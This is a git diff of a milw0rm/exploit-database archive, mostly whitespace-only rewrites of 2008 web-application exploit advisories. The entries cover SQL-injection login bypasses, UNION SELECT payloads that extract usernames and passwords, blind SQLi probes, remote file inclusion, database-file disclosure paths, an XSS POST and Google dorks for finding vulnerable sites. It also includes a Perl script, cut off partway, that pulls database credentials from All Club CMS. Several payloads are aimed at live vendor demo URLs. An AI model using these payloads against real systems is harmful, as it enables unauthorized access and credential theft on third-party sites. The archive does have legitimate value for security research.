-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-27]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                   Mor0ccan nightamres Will Be The Best   The_5p3ctrum , BayHay & Me :)                    [!]
+***********************************************************************************************************************************************************
+ +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                       [    Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ]                                   ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   TeaM     : Mor0ccan nightamres                                                                        ¦       ¦                                       ¦
+¦   Script   : http://ocean12tech.com                                                                     ¦       ¦                ![ ]!                  ¦
+¦   Download : http://ocean12tech.com/products/membership/                                                ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+Bypass : ........
+
+Go To The Admin Panel.
+and Login with this information :
+
+username : admin ' or ' 1=1
+password : Cyber-Zone or any thing you want :)
+
+yeah bro you  loged in dont worry :)
+
+and this is a live demo :
+
+http://ocean12tech.com/products/membership/demo/
+
+EnjoY.
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7255.txt b/platforms/php/webapps/7255.txt
index f1f413afe..42c95c0d2 100755
--- a/platforms/php/webapps/7255.txt
+++ b/platforms/php/webapps/7255.txt
@@ -1,45 +1,45 @@
-=============================================================================================================
-
-
-  [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability
-
-       Software : PageTree CMS version 0.0.2 BETA 0001
-       Vendor   : http://pagetreecms.co.cc/
-       Download : http://pagetree.googlecode.com/svn/trunk/
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-=============================================================================================================
-
-
-  [o] Vulnerable file
-
-       admin/plugins/Online_Users/main.php
-
-        include($GLOBALS['PT_Config']['dir']['data']."content/1.php");
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]
-
-
-=============================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-        
-=============================================================================================================
-
-# milw0rm.com [2008-11-27]
+=============================================================================================================
+
+
+  [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability
+
+       Software : PageTree CMS version 0.0.2 BETA 0001
+       Vendor   : http://pagetreecms.co.cc/
+       Download : http://pagetree.googlecode.com/svn/trunk/
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+=============================================================================================================
+
+
+  [o] Vulnerable file
+
+       admin/plugins/Online_Users/main.php
+
+        include($GLOBALS['PT_Config']['dir']['data']."content/1.php");
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode]
+
+
+=============================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+        
+=============================================================================================================
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7256.txt b/platforms/php/webapps/7256.txt
index 51e5d0515..1e27ac684 100755
--- a/platforms/php/webapps/7256.txt
+++ b/platforms/php/webapps/7256.txt
@@ -1,44 +1,44 @@
-----------------Mor0ccan Nightmares----------------
-
-------------------------------
-Script: Turnkey Arcade Script-
-------------------------------
-
------------------------------------
-Site: http://www.turnkeyarcade.com-
------------------------------------
-
------------------------------------------------------------
-Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>-
------------------------------------------------------------
-
-
------------------------------------------------------------------------
-Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
------------------------------------------------------------------------
----
-Ex:
----
-
-http://localhost/index.php?action=play&id=[sql]
-http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
-
---------
-exploit:
---------
-
-http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
-
------
-Demo:
------
-
-http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
-
--------
-Greetz:
--------
-
-Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
-
-# milw0rm.com [2008-11-27]
+----------------Mor0ccan Nightmares----------------
+
+------------------------------
+Script: Turnkey Arcade Script-
+------------------------------
+
+-----------------------------------
+Site: http://www.turnkeyarcade.com-
+-----------------------------------
+
+-----------------------------------------------------------
+Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>-
+-----------------------------------------------------------
+
+
+-----------------------------------------------------------------------
+Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
+-----------------------------------------------------------------------
+---
+Ex:
+---
+
+http://localhost/index.php?action=play&id=[sql]
+http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
+
+--------
+exploit:
+--------
+
+http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
+
+-----
+Demo:
+-----
+
+http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
+
+-------
+Greetz:
+-------
+
+Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7257.txt b/platforms/php/webapps/7257.txt
index cdaff2634..fee67c1b9 100755
--- a/platforms/php/webapps/7257.txt
+++ b/platforms/php/webapps/7257.txt
@@ -1,47 +1,47 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## BaSiC-CMS ( index.php r )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script : BaSiC-CMS
-##
-## site   : www.Basic-CMS.de
-##
-########################
-########################
-##
-##     -(:: SQL ::)-
-##
-##    www.site.com/pages/
-##          index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
-##
-##  -(:: L!VE DEMO ::)-
-##
-##    http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
-##
-#######################
-#######################
-
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
- :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-11-27]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## BaSiC-CMS ( index.php r )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script : BaSiC-CMS
+##
+## site   : www.Basic-CMS.de
+##
+########################
+########################
+##
+##     -(:: SQL ::)-
+##
+##    www.site.com/pages/
+##          index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
+##
+##  -(:: L!VE DEMO ::)-
+##
+##    http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
+##
+#######################
+#######################
+
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+ :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7258.txt b/platforms/php/webapps/7258.txt
index 203bbe0e6..e7583d9f7 100755
--- a/platforms/php/webapps/7258.txt
+++ b/platforms/php/webapps/7258.txt
@@ -1,15 +1,15 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 FAQ Manager Pro
-Author : Mountassif Moad
- Evil Finger / v4 Team
-Vulnerability : Database Disclosure Vulnerability
----------------------------------------------------------
-#########################################################
-XPL :
-http://site.com/path//admin/o12faq.mdb
-Demo :
-http://ocean12tech.com/products/faq/demo/
-http://ocean12tech.com/products/faq/demo/admin/o12faq.mdb
-
-# milw0rm.com [2008-11-27]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 FAQ Manager Pro
+Author : Mountassif Moad
+ Evil Finger / v4 Team
+Vulnerability : Database Disclosure Vulnerability
+---------------------------------------------------------
+#########################################################
+XPL :
+http://site.com/path//admin/o12faq.mdb
+Demo :
+http://ocean12tech.com/products/faq/demo/
+http://ocean12tech.com/products/faq/demo/admin/o12faq.mdb
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7260.txt b/platforms/php/webapps/7260.txt
index cf0759a9f..e0c4571e6 100755
--- a/platforms/php/webapps/7260.txt
+++ b/platforms/php/webapps/7260.txt
@@ -1,12 +1,12 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Basic-cms (ASP)
-D0wn : http://www.basic-cms.com/download-basiccms.zip
-Author : Mountassif Moad
- Evil Finger / v4 Team
-Vulnerability : Database Disclosure Vulnerability
----------------------------------------------------------
-#########################################################
-http://www.site.com/acm2000.mdb
-
-# milw0rm.com [2008-11-28]
+#########################################################
+---------------------------------------------------------
+Portal Name: Basic-cms (ASP)
+D0wn : http://www.basic-cms.com/download-basiccms.zip
+Author : Mountassif Moad
+ Evil Finger / v4 Team
+Vulnerability : Database Disclosure Vulnerability
+---------------------------------------------------------
+#########################################################
+http://www.site.com/acm2000.mdb
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7261.txt b/platforms/php/webapps/7261.txt
index 15d211662..d1a0ef3f7 100755
--- a/platforms/php/webapps/7261.txt
+++ b/platforms/php/webapps/7261.txt
@@ -1,69 +1,69 @@
-==================================================================
-  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
-==================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 27 November 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Basic PHP CMS
- DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
-#####################################################
-
---- Blind SQL Injection ---
-
------------------------------
- Vulnerable File (index.php)
------------------------------
-
-if ($strID != "")
-{
-	$strsql = "SELECT description ";
-	$strsql .=" FROM pages_t_details ";
-	$strsql .=" WHERE id=$strID";
-	$conclass =new DataBase();
-	$rst= $conclass->Execute ($strsql,$strError);
-	if ($strError=="")
-	{
-		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) 
-	     {
-			$strDetails=$line['description'];
-		}
-	}
-	
-}
-
----------
- Exploit
----------
-
-Test Blind SQL Injection in MYSQL Version 5
-
-True
-[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--
-
-False
-[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--
-
-
-#######################################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-# milw0rm.com [2008-11-28]
+==================================================================
+  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
+==================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 27 November 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Basic PHP CMS
+ DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
+#####################################################
+
+--- Blind SQL Injection ---
+
+-----------------------------
+ Vulnerable File (index.php)
+-----------------------------
+
+if ($strID != "")
+{
+	$strsql = "SELECT description ";
+	$strsql .=" FROM pages_t_details ";
+	$strsql .=" WHERE id=$strID";
+	$conclass =new DataBase();
+	$rst= $conclass->Execute ($strsql,$strError);
+	if ($strError=="")
+	{
+		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) 
+	     {
+			$strDetails=$line['description'];
+		}
+	}
+	
+}
+
+---------
+ Exploit
+---------
+
+Test Blind SQL Injection in MYSQL Version 5
+
+True
+[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--
+
+False
+[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--
+
+
+#######################################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7263.txt b/platforms/php/webapps/7263.txt
index fba0b61a0..9c78a05eb 100755
--- a/platforms/php/webapps/7263.txt
+++ b/platforms/php/webapps/7263.txt
@@ -1,22 +1,21 @@
-
-Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
-
---------------------------------------------------------------
-
-Author: MrDoug
-E-mail: mrdoug13[at]gmail[dot]com
-
---------------------------------------------------------------
-
-Exploit: http://demo.hotelsadmin.com/admin/index.php
-
-Username == admin' or '1'='1
-password == (whatever)
-
---------------------------------------------------------------
-
-Greetz to Slappywag
-
---------------------------------------------------------------
-
-# milw0rm.com [2008-11-28]
+Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability
+
+--------------------------------------------------------------
+
+Author: MrDoug
+E-mail: mrdoug13[at]gmail[dot]com
+
+--------------------------------------------------------------
+
+Exploit: http://demo.hotelsadmin.com/admin/index.php
+
+Username == admin' or '1'='1
+password == (whatever)
+
+--------------------------------------------------------------
+
+Greetz to Slappywag
+
+--------------------------------------------------------------
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7265.txt b/platforms/php/webapps/7265.txt
index 57de0426f..b13bea777 100755
--- a/platforms/php/webapps/7265.txt
+++ b/platforms/php/webapps/7265.txt
@@ -1,81 +1,81 @@
-000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
- 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
- 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
- 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
- 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
- 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
- 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
- 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
-000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000
-
-
-
-[+] Script               : Web Calendar System v 3.22/3.40/3.05/3.23
-
-[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection )
-
-[+] Google Dork          : intitle:Web Calendar system v 3.40        inurl:.asp
-[+] Google Dork          : intitle:Web Calendar system v 3.22        inurl:.asp
-[+] Google Dork          : intitle:Web Calendar system v 3.23        inurl:.asp
-[+] Google Dork          : intitle:Web Calendar system v 3.05        inurl:.asp
-
-[+] Contact              : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s
-
-
---//--> Exploit : 
-
-1) Remote Bypass Exploit :
-
-http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM
-
-username:' or '1'='1
-
-password:' or '1'='1
-
-2) Remote XSS exploit : 
-
-http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
-
-POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1
-Host: www.southforkwatershed.org
-User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
-Accept-Encoding: gzip,deflate
-Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
-Keep-Alive: 300
-Connection: keep-alive
-Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
-Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 55
-SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E
-
-
-HTTP/1.x 200 OK
-Cache-Control: no-cache
-Date: Fri, 28 Nov 2008 11:45:08 GMT
-Pragma: no-cache
-Content-Type: text/html
-Expires: Fri, 28 Nov 2008 11:44:08 GMT
-Server: Microsoft-IIS/6.0
-MicrosoftOfficeWebServer: 5.0_Pub
-X-Powered-By: ASP.NET
-Content-Encoding: gzip
-Vary: Accept-Encoding
-Transfer-Encoding: chunked
-
-
-In simple words :
-
-POST :
-
-SText=<script>alert('Blackbeard is here')</script>
-
-3) Remote SQL injection:
-
-http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects
-
-[peace xD]
-
-# milw0rm.com [2008-11-28]
+000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
+ 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
+ 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
+ 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
+ 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
+ 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
+ 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
+ 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
+000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000
+
+
+
+[+] Script               : Web Calendar System v 3.22/3.40/3.05/3.23
+
+[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit+Remote SQL Injection )
+
+[+] Google Dork          : intitle:Web Calendar system v 3.40        inurl:.asp
+[+] Google Dork          : intitle:Web Calendar system v 3.22        inurl:.asp
+[+] Google Dork          : intitle:Web Calendar system v 3.23        inurl:.asp
+[+] Google Dork          : intitle:Web Calendar system v 3.05        inurl:.asp
+
+[+] Contact              : blackbeard-sql @ hotmail.fr \\ Damn u crawlers :s
+
+
+--//--> Exploit : 
+
+1) Remote Bypass Exploit :
+
+http://[website]/[script]/calendar.asp?DoAction=USER&Change=LOGINFORM
+
+username:' or '1'='1
+
+password:' or '1'='1
+
+2) Remote XSS exploit : 
+
+http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
+
+POST /Calendar/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search HTTP/1.1
+Host: www.southforkwatershed.org
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Connection: keep-alive
+Referer: http://[website]/[script]/calendar.asp?Client=1&Lang=3&Search=1&DoAction=Calendar&View=Search
+Cookie: ASPSESSIONIDSABBQBTD=MMPLNBODFDNEKLCLBECLLJOC
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+SText=%3Cscript%3Ealert%28%27XSSed%27%29%3C%2Fscript%3E
+
+
+HTTP/1.x 200 OK
+Cache-Control: no-cache
+Date: Fri, 28 Nov 2008 11:45:08 GMT
+Pragma: no-cache
+Content-Type: text/html
+Expires: Fri, 28 Nov 2008 11:44:08 GMT
+Server: Microsoft-IIS/6.0
+MicrosoftOfficeWebServer: 5.0_Pub
+X-Powered-By: ASP.NET
+Content-Encoding: gzip
+Vary: Accept-Encoding
+Transfer-Encoding: chunked
+
+
+In simple words :
+
+POST :
+
+SText=<script>alert('Blackbeard is here')</script>
+
+3) Remote SQL injection:
+
+http://[website]/[script]/calendar.asp?DoAction=Calendar&Q_DATE=11/28/2008&View=Event&IDEvent=2824+union+select+1+from+msysobjects
+
+[peace xD]
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7266.pl b/platforms/php/webapps/7266.pl
index 984c37f87..9e17b66c6 100755
--- a/platforms/php/webapps/7266.pl
+++ b/platforms/php/webapps/7266.pl
@@ -1,130 +1,130 @@
-#!/usr/bin/perl 
-
-=about
-
- All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
- -------------------------------------------------------
- by athos - staker[at]hotmail[dot]it
- download on http://sourceforge.net
- -------------------------------------------------------
- Usage: perl exploit.pl localhost/cms [MODE]
-        perl exploit.pl localhost/cms all 
-        perl exploit.pl localhost/cms default    
- -------------------------------------------------------
- NOTE: Don't add me on MSN Messenger
-                
-
-=cut
-
-use strict;
-use warnings;
-use IO::Socket;
-use LWP::UserAgent;
-
-my (@conf,$result);
-
-my $host = shift;
-my $path = shift;
-my $mode = shift or &usage;
-my @data = split /=\s/,dbconfig();
-
-die "Exploit Failed!\n" unless(join('',@data) =~ /DB_PASS/i);
-
-if($mode =~ /all/i)
-{
-   my $http = new LWP::UserAgent(
-                                  agent   => 'Lynx (textmode)',
-                                  timeout => 5,
-                                ) or die $!;  
-                              
-   my $send = $http->get("http://${host}/${path}/accms.dat");
-   
-   if($send->is_success)
-   {
-      print STDOUT $send->content;
-      exit;
-   }
-   else
-   {
-      print STDERR $send->status_line;
-      exit;
-   }
-}
-
-
-if($mode =~ /default/i)
-{
-   $data[9] =~ s/\s/\0/;      # password
-   $data[8] =~ s/DB_PASS/\0/; # username
-   $data[7] =~ s/DB_USER/\0/; # db host
-   $data[6] =~ s/DB_HOST/\0/; # db name
-   $data[5] =~ s/DEF_DB/\0/;  # db type
-
-   @conf = (
-             'dbhost:'   => $data[7],
-             'dbname:'   => $data[6],
-             'dbtype:'   => $data[5],
-             'username:' => $data[8],
-             'password:' => $data[9],
-          );                
-
-   foreach(@conf)
-   {
-      $result .= $_;
-   }       
-
-   my $content = join '',split / /,$result;
-
-   if($content =~ /(dbhost|dbname|dbtype|username|password)/i)
-   {
-      print STDOUT "[-] Exploit Successfully!\n";
-      print STDOUT $content;
-      exit; 
-   }
-   else
-   {
-      print STDOUT "[-] Exploit Failed!\n";
-      print STDOUT "[-] by athos - staker[at]hotmail[dot]it\n";
-      exit;
-   }  
-}
-
-
-sub dbconfig
-{
-   my $html;
-   my $sock = new IO::Socket::INET(
-                                    PeerAddr => $host,
-                                    PeerPort => 80,
-                                    Proto    => 'tcp',
-                                  ) or die $!;
-                                  
-                                     
-   my $data = "GET /$path/accms.dat HTTP/1.1\r\n".
-              "Host: $host\r\n".
-              "User-Agent: Lynx (textmode)\r\n".
-              "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
-              "Accept-Language: en-us,en;q=0.5\r\n".
-              "Accept-Encoding: text/plain\r\n".
-              "Connection: close\r\n\r\n";
-              
-   $sock->send($data);
-  
-   while(<$sock>) 
-   { 
-      $html .= $_; 
-   }  return $html if $html =~ m{HTTP/1.1 200 OK};            
-}   
-   
-   
-   
-sub usage
-{
-   print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit\n";
-   print STDOUT "[-] Usage: perl $0 [host] [path] [mode]\n";
-   print STDOUT "           perl $0 localhost /cms all\n";
-   print STDOUT "           perl $0 localhost /cms default\n"; 
-   exit;
-}  
-
-# milw0rm.com [2008-11-28]
+#!/usr/bin/perl 
+
+=about
+
+ All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
+ -------------------------------------------------------
+ by athos - staker[at]hotmail[dot]it
+ download on http://sourceforge.net
+ -------------------------------------------------------
+ Usage: perl exploit.pl localhost/cms [MODE]
+        perl exploit.pl localhost/cms all 
+        perl exploit.pl localhost/cms default    
+ -------------------------------------------------------
+ NOTE: Don't add me on MSN Messenger
+                
+
+=cut
+
+use strict;
+use warnings;
+use IO::Socket;
+use LWP::UserAgent;
+
+my (@conf,$result);
+
+my $host = shift;
+my $path = shift;
+my $mode = shift or &usage;
+my @data = split /=\s/,dbconfig();
+
+die "Exploit Failed!\n" unless(join('',@data) =~ /DB_PASS/i);
+
+if($mode =~ /all/i)
+{
+   my $http = new LWP::UserAgent(
+                                  agent   => 'Lynx (textmode)',
+                                  timeout => 5,
+                                ) or die $!;  
+                              
+   my $send = $http->get("http://${host}/${path}/accms.dat");
+   
+   if($send->is_success)
+   {
+      print STDOUT $send->content;
+      exit;
+   }
+   else
+   {
+      print STDERR $send->status_line;
+      exit;
+   }
+}
+
+
+if($mode =~ /default/i)
+{
+   $data[9] =~ s/\s/\0/;      # password
+   $data[8] =~ s/DB_PASS/\0/; # username
+   $data[7] =~ s/DB_USER/\0/; # db host
